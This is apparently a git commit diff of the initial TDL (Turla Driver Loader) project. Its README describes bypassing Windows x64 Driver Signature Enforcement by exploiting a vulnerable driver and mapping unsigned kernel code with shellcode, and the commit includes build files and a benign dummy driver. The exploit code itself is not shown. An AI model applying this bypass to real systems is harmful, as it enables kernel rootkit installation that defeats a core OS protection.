Initial commit
This commit is contained in:
hfiref0x 2016-02-04 11:42:05 +07:00
parent c26b317ca2
commit 20a4e9b210
49 changed files with 9438 additions and 0 deletions

BIN
Compiled/Furutaka.exe Normal file

Binary file not shown.

BIN
Compiled/dummy.sys Normal file

Binary file not shown.

BIN
Compiled/dummy2.sys Normal file

Binary file not shown.

40
README.md Normal file
View File

@ -0,0 +1,40 @@
# TDL (Turla Driver Loader)
## Driver loader for bypassing Windows x64 Driver Signature Enforcement
For more info see
+ Defeating x64 Driver Signature Enforcement http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3322
+ WinNT/Turla http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193
# System Requirements and limitations
+ x64 Windows 7/8/8.1/10.
+ TDL designed only for x64 Windows, Vista not listed as supported because it is obsolete.
+ Administrative privilege is required.
+ Loaded drivers MUST BE specially designed to run as "driverless".
+ No SEH support for target drivers.
+ No driver unloading.
+ Only ntoskrnl import resolved, everything else is up to you.
+ Dummy driver examples provided.
You use it at your own risk. Some lazy AV may flag this loader as malware.
# Differences between DSEFix and TDL
While both DSEFix and TDL uses advantage of driver exploit they completely different on way of it use.
+ DSEFix manipulate kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL). Main advantage of DSEFix is it simplicity - you turn DSE off - load your driver (or patched one) and nothing else required. Main disadvantage of DSEFix is that on the modern version of Windows (8+) g_CiOptions variable is subject of PatchGuard (KPP) protection, which mean DSEFix is a potential BSOD-generator.
+ TDL does not patch any kernel variables, which makes it friendly to PatchGuard. It uses small shellcode which maps your driver to kernel mode without involving Windows loader (and as result without triggering any parts of DSE) and executes it. This is main advantage of TDL - non invasive bypass of DSE. There are many disadvantages however - the first and main -> your driver MUST BE specially created to run as "driverless" which mean you will be unable to load *any* driver but only specially designed. Your driver will exist in kernel mode as executable code buffer, it won't be linked to PsLoadedModuleList, there will be other limitations. However this code will work at kernel mode and user mode application will be able communicate with it. You can load multiple drivers, of course if they are not conflict with each other.
# Build
TDL comes with full source code.
In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above.
# Authors
(c) 2016 TDL Project
# Credits
+ R136a1
+ N. Rin

20
Source/DummyDrv/dummy.sln Normal file
View File

@ -0,0 +1,20 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -0,0 +1,239 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
<TemplateGuid>{1bc93793-694f-48fe-9372-81e2b05556fd}</TemplateGuid>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
<Configuration>Debug</Configuration>
<Platform Condition="'$(Platform)' == ''">Win32</Platform>
<RootNamespace>dummy</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver8.1</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Speed</FavorSizeOrSpeed>
<BufferSecurityCheck>false</BufferSecurityCheck>
<ExpandAttributedSource>true</ExpandAttributedSource>
<AssemblerOutput>All</AssemblerOutput>
<BrowseInformation>true</BrowseInformation>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>true</EnablePREfast>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
<Link>
<SuppressStartupBanner>false</SuppressStartupBanner>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapExports>true</MapExports>
<LargeAddressAware>true</LargeAddressAware>
<EntryPointSymbol>DriverEntry</EntryPointSymbol>
<RandomizedBaseAddress>true</RandomizedBaseAddress>
<DataExecutionPrevention>true</DataExecutionPrevention>
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemGroup>
<FilesToPackage Include="$(TargetPath)" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,26 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Driver Files">
<UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
<Extensions>inf;inv;inx;mof;mc;</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<SignMode>Off</SignMode>
</PropertyGroup>
</Project>

View File

@ -0,0 +1,63 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.C
*
* VERSION: 1.00
*
* DATE: 29 Jan 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include <ntddk.h>
DRIVER_INITIALIZE DriverEntry;
#pragma alloc_text(INIT, DriverEntry)
/*
* DriverEntry
*
* Purpose:
*
* Driver base entry point.
*
*/
NTSTATUS DriverEntry(
_In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath
)
{
LARGE_INTEGER tm;
PEPROCESS Process;
tm.QuadPart = -10000000;
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry);
Process = PsGetCurrentProcess();
do {
KeDelayExecutionThread(KernelMode, FALSE, &tm);
DbgPrint("I'm at %s, Process : %lu (%p)",
__FUNCTION__,
(ULONG)PsGetCurrentProcessId(),
Process
);
} while (1);
return STATUS_SUCCESS;
}

View File

@ -0,0 +1,20 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
{3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -0,0 +1,242 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
<TemplateGuid>{1bc93793-694f-48fe-9372-81e2b05556fd}</TemplateGuid>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
<Configuration>Debug</Configuration>
<Platform Condition="'$(Platform)' == ''">Win32</Platform>
<RootNamespace>dummy</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver8.1</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Speed</FavorSizeOrSpeed>
<BufferSecurityCheck>false</BufferSecurityCheck>
<ExpandAttributedSource>true</ExpandAttributedSource>
<AssemblerOutput>All</AssemblerOutput>
<BrowseInformation>true</BrowseInformation>
<CompileAs>CompileAsC</CompileAs>
<EnablePREfast>false</EnablePREfast>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
<Link>
<SuppressStartupBanner>false</SuppressStartupBanner>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapExports>true</MapExports>
<LargeAddressAware>true</LargeAddressAware>
<EntryPointSymbol>DriverEntry</EntryPointSymbol>
<RandomizedBaseAddress>true</RandomizedBaseAddress>
<DataExecutionPrevention>true</DataExecutionPrevention>
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemGroup>
<FilesToPackage Include="$(TargetPath)" />
</ItemGroup>
<ItemGroup>
